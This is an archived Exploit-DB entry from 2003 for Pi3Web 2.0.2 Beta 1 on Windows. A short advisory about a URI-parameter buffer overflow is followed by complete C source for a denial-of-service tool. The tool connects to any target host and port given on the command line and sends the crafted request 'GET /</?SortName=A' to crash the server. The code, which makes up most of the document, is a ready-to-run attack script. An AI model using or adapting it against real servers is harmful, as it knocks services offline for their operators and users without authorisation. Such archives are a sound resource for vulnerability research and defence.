Pi3Web 2.0.2 - SortName Buffer Overflow

EDB-ID:

22718

Author:

posidron

Type:

dos

Platform:

Windows

Published:

2003-06-02

source: http://www.securityfocus.com/bid/7787/info

Pi3Web is prone to a buffer overflow vulnerability. This is due to insufficient bounds checking of URI parameters. This could be exploited to cause a denial of service or possibly to execute malicious instructions.

This issue was reported for Pi3Web 2.0.2 Beta 1 on Windows platforms. 

/*********************************************************************
*
*     Denial of Service Attack against Pi3 Web Server v2.0.2 05/2003
*
*
*    Tripbit Security Development
*    ----------------------------
*
*    Author: posidron
*
*    Contact
*    [-] Mail: posidron@tripbit.org
*    [-] Web: http://www.tripbit.org
*    [-] Forum: http://www.tripbit.org/wbboard
*       [-] IRC: irc.euirc.net 6667 #tripbit
*
*
*    Greets: Rushjo, Tec, STeFaN, Havoc][, MisterMoe
*     Special thx: PeaceTreaty (securecrew.net)
*
*********************************************************************/

#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int port, sockfd;
    struct sockaddr_in server;
    struct hostent *host;

    char sendstring[1024];

    strcpy(sendstring,"GET /</?SortName=A HTTP/1.0\n\n");

    if(argc < 3)
    {
        printf("Usage: %s [target] <port>\n",argv[0]);
        exit(0);
    }

    port = atoi(argv[2]);

    host = gethostbyname(argv[1]);
    if(host == NULL)
    {
        printf("Connection failed!...\n");
        exit(0);
    }

    server.sin_family = AF_INET;
    server.sin_port = htons(port);
    server.sin_addr.s_addr = inet_addr((char*)argv[1]);

    if( (sockfd = socket(AF_INET,SOCK_STREAM,0)) < 0)
    {
        printf("Can't start socket()!\n");
        exit(0);
    }

    if(connect(sockfd,(struct sockaddr*)&server,sizeof(server)) < 0)
    {
        printf("Can't connect!\n");
        exit(0);
    }

    printf("Dos against Pi3 Web Server v2.0.2\n");

    write(sockfd,sendstring,strlen(sendstring));

    printf("Attack done!...\n");

    close(sockfd);
}